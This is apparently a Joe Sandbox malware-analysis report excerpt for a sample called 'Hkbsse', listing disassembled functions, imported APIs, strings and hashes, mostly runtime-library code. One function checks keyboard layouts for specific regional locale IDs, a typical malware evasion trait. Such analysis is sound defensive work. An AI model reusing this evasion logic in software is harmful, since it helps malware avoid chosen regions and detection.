                    • Opcode Fuzzy Hash: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction Fuzzy Hash: AC51D131B00224EBCF14DF52D885BAEB771AF44314F5540AAE9027B3D2CB38AE45CBA5
                    Function 00442DB0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: iCD$iCD
                    • API String ID: 0-1699611018
                    • Opcode ID: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction ID: 3233a7ddcac68cb8f574e6c19afe3b518d5c820d3ffb50c00228bdd3c5303718
                    • Opcode Fuzzy Hash: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction Fuzzy Hash: 7DF15071E002199FEF14CFA9C9806AEB7B1FF48714F25826AE815A7344D774AE05CB94
                    Function 0041C878 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C87E
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C88C
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C89D
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C8AE
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C8BF
                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C8D0
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C8E1
                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C8F2
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C903
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C914
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C925
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C936
                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C947
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C958
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C969
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C97A
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C98B
                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C99C
                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C9AD
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C9BE
                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C9CF
                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C9E0
                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C9F1
                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041CA02
                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041CA13
                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041CA24
                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041CA35
                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041CA46
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041CA57
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041CA68
                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041CA79
                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041CA8A
                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041CA9B
                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041CAAC
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041CABD
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041CACE
                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041CADF
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041CAF0
                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041CB01
                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041CB12
                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041CB23
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                    • API String ID: 667068680-295688737
                    • Opcode ID: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction ID: 0f84095e92aac1c2e0bb15fd21b29d90348e2d41669b35d16af1684e6b0aebcd
                    • Opcode Fuzzy Hash: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction Fuzzy Hash: 38612875952711EBD7016FB4FC0DF893AB8AA09B53B608537F906D21B2E6F88004CB6D
                    Function 0041F138 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F3CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pEvents
                    • API String ID: 2141394445-2498624650
                    • Opcode ID: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction ID: ec5f4af2191e720b375f933e814ac6687ada2e9c436967f06c552350c2c861e3
                    • Opcode Fuzzy Hash: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction Fuzzy Hash: DE81BE35D00219DBCF14DFA9C981BEEB7B1AF44314F14446BE811A7381DB38AD8ACB59
                    Function 004245EE Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 189timeregistryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ListArray.LIBCONCRT ref: 00424648
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 004244F5
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?), ref: 004244FF
                    • ListArray.LIBCONCRT ref: 0042467C
                    • Hash.LIBCMT ref: 004246E5
                    • Hash.LIBCMT ref: 004246F5
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0042478A
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424797
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247A4
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247B1
                      • Part of subcall function 00429D51: std::bad_exception::bad_exception.LIBCMT ref: 00429D73
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427B25,?,000000FF,00000000), ref: 00424839
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042485B
                    • GetLastError.KERNEL32(0042559B,?,?,00000000,?,?), ref: 0042486D
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042488A
                      • Part of subcall function 0041FCBA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0042559B,00000008,?,0042488F,?,00000000,00427B16,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FCD2
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004248B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID: LB
                    • API String ID: 2750799244-539997225
                    • Opcode ID: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction ID: ef0eb92deb565825a4515ec48e111432acd83b2f5c02b78017a4afb90a903cfa
                    • Opcode Fuzzy Hash: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction Fuzzy Hash: 31816EB0B11A62BAD708DF75D845BD9FBA8BF08704F50421FF42897281CBB8A564CBD5
                    Function 044BF669 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 044BF6AD
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF263
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF275
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF287
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF299
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2AB
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2BD
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2CF
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2E1
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2F3
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF305
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF317
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF329
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF33B
                    • _free.LIBCMT ref: 044BF6A2
                      • Part of subcall function 044BB0FC: HeapFree.KERNEL32(00000000,00000000,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?), ref: 044BB112
                      • Part of subcall function 044BB0FC: GetLastError.KERNEL32(?,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?,?), ref: 044BB124
                    • _free.LIBCMT ref: 044BF6C4
                    • _free.LIBCMT ref: 044BF6D9
                    • _free.LIBCMT ref: 044BF6E4
                    • _free.LIBCMT ref: 044BF706
                    • _free.LIBCMT ref: 044BF719
                    • _free.LIBCMT ref: 044BF727
                    • _free.LIBCMT ref: 044BF732
                    • _free.LIBCMT ref: 044BF76A
                    • _free.LIBCMT ref: 044BF771
                    • _free.LIBCMT ref: 044BF78E
                    • _free.LIBCMT ref: 044BF7A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: 8"F$`'F
                    • API String ID: 161543041-3117062166
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: c055fb2d48fd13052c0f01661329233a9d13769c596fd26fc21b7cc879b73c83
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: 21313E31600A41EBEF31AA3ADC45BEB77E4EB00354F10846BE8D9D6661DE75B845CBB0
                    Function 0449F39F Relevance: 24.2, APIs: 16, Instructions: 229COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0449F3A6
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0449F632
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog3std::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1590901807-0
                    • Opcode ID: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction ID: c18015e9f2364e49083ddf5a11a201a5595a48496c6f46955ed331679766de48
                    • Opcode Fuzzy Hash: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction Fuzzy Hash: EE818E31E002189BDF24DFA9C985BAEBBF0AF14314F24405AD801E7382DB74BD4AEB50
                    Function 00405BC0 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 435COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: 46048c94105e5faabe7612071a4c00acadbdd48ad5745136731e4014b29af49b
                    • Instruction ID: 76edcd2264c5843344100667b3f81de8b4abb57d1d227a43f18c015c8770d745
                    • Opcode Fuzzy Hash: 46048c94105e5faabe7612071a4c00acadbdd48ad5745136731e4014b29af49b
                    • Instruction Fuzzy Hash: 6AF1E37090021CABEB24DF54CD49BDEBBB9EB44304F5041AEE409A72C1DB789AC4CF99
                    Function 0041D139 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00465720,00000FA0,?,?,0041D117), ref: 0041D145
                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041D117), ref: 0041D150
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041D117), ref: 0041D161
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D173
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D181
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041D117), ref: 0041D1A4
                    • ___scrt_fastfail.LIBCMT ref: 0041D1B5
                    • DeleteCriticalSection.KERNEL32(00465720,00000007,?,?,0041D117), ref: 0041D1C0
                    • CloseHandle.KERNEL32(00000000,?,?,0041D117), ref: 0041D1D0
                    Strings
                    • kernel32.dll, xrefs: 0041D15C
                    • WakeAllConditionVariable, xrefs: 0041D179
                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D14B
                    • SleepConditionVariableCS, xrefs: 0041D16D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 3578986977-3242537097
                    • Opcode ID: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction ID: 252a5c44d21d70e961eeb017c792f98daaed356a7d9fc3a6fd8a800735b4e431
                    • Opcode Fuzzy Hash: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction Fuzzy Hash: 82011275A40B11ABD6211B75BC0DB9B3668DB40BA3F540436FD05D23A5EAB9C840CA6E
                    Function 004327DF Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004327F1
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432812
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0043281F
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043286D
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004328F4
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00432907
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432954
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction ID: 3f1873845dbcbd1064d3a19cd28863eec2e57fe1390348ff4fb73f67cee00bd1
                    • Opcode Fuzzy Hash: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction Fuzzy Hash: 3F81B234900249ABDF1AEF95CA41BBF7B71AF09308F04509AEC407B352C7BA8D15DB69
                    Function 00422942 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00422951
                      • Part of subcall function 00423C3C: GetVersionExW.KERNEL32(?), ref: 00423C60
                      • Part of subcall function 00423C3C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423CFF
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422965
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422986
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004229EF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422A23
                      • Part of subcall function 004208FD: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042091D
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422AA3
                      • Part of subcall function 0042246C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422480
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AEB
                      • Part of subcall function 004208D2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004208EE
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AFF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422B10
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422B5D
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422B82
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422B8E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction ID: 3497a36c357a9217bd5ea5df72823c379328e9b881d8ed218cbe5642490ce89b
                    • Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction Fuzzy Hash: 4881C431B00626ABCB18DFA9EA9057EBBF1BB48304B94413FD441A7751EBF86941CB4D
                    Function 0043F402 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0043F446
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043EFFC
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F00E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F020
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F032
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F044
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F056
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F068
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F07A
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F08C
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F09E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0B0
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0C2
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0D4
                    • _free.LIBCMT ref: 0043F43B
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F45D
                    • _free.LIBCMT ref: 0043F472
                    • _free.LIBCMT ref: 0043F47D
                    • _free.LIBCMT ref: 0043F49F
                    • _free.LIBCMT ref: 0043F4B2
                    • _free.LIBCMT ref: 0043F4C0
                    • _free.LIBCMT ref: 0043F4CB
                    • _free.LIBCMT ref: 0043F503
                    • _free.LIBCMT ref: 0043F50A
                    • _free.LIBCMT ref: 0043F527
                    • _free.LIBCMT ref: 0043F53F
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: dbd078dc2a70aa704cf8e78683bcdcdf520610d7d758412ab309d08eef7ce9b5
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: FC318271940300AFDB219A39D806B5773E5AF18314F14642FE094DB292DF3CEC588B29
                    Function 004353B6 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 308COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004354B1
                    • type_info::operator==.LIBVCRUNTIME ref: 004354D8
                    • ___TypeMatch.LIBVCRUNTIME ref: 004355E4
                    • CatchIt.LIBVCRUNTIME ref: 00435639
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004356BF
                    • _UnwindNestedFrames.LIBCMT ref: 00435746
                    • CallUnexpected.LIBVCRUNTIME ref: 00435761
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm$$5
                    • API String ID: 4234981820-3170930526
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 2765267077130b143c7d318870dfd271b72c56ee2a1170d1c4f92d41ddd0a8a9
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 02C19E71800A09EFCF29DFA5C8819AEBBB5BF18315F54505BE8156B301C339EA51CF99
                    Function 0041FB81 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423CF6), ref: 0041FB8F
                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FB9D
                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FBAB
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FBD9
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FBF4
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FC00
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FC16
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                    • API String ID: 1654681794-465693683
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: 2faeb71938919a1c0d9ecc2d1d00a42f8f566497dce8370ae698b9c1d05c50ed
